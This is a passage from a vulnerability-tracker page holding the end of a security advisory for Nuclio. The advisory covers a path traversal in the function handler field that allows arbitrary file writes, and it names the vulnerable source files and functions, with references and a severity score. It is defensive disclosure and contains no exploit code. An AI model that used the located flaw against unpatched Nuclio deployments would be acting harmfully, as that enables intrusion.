`handler` module name containing path separator characters before the build pipeline is invoked (at API request validation time).\n\n---\n\n## Resources\n\n- Vulnerable file: `pkg/processor/build/builder.go` \u2014 function `writeFunctionSourceCodeToTempFile`, line 654\n- Parser: `pkg/functionconfig/handler.go` \u2014 function `ParseHandler`, line 25\n- Go `path.Join` behavior: https://pkg.go.dev/path#Join\n- CWE-22: https://cwe.mitre.org/data/definitions/22.html\n- OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal",
  "id": "GHSA-wpcj-rmv4-86qg",
  "modified": "2026-07-16T19:47:17Z",
  "published": "2026-07-16T19:47:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nuclio/nuclio/security/advisories/GHSA-wpcj-rmv4-86qg"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuclio/nuclio/pull/4143"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuclio/nuclio/commit/2a55d3a8bd4d49226cb4742020303f5bf2a0931d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nuclio/nuclio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuclio/nuclio/releases/tag/1.16.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Nuclio: Unauthenticated path traversal in spec.handler allows arbitrary file write in Dashboard container"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…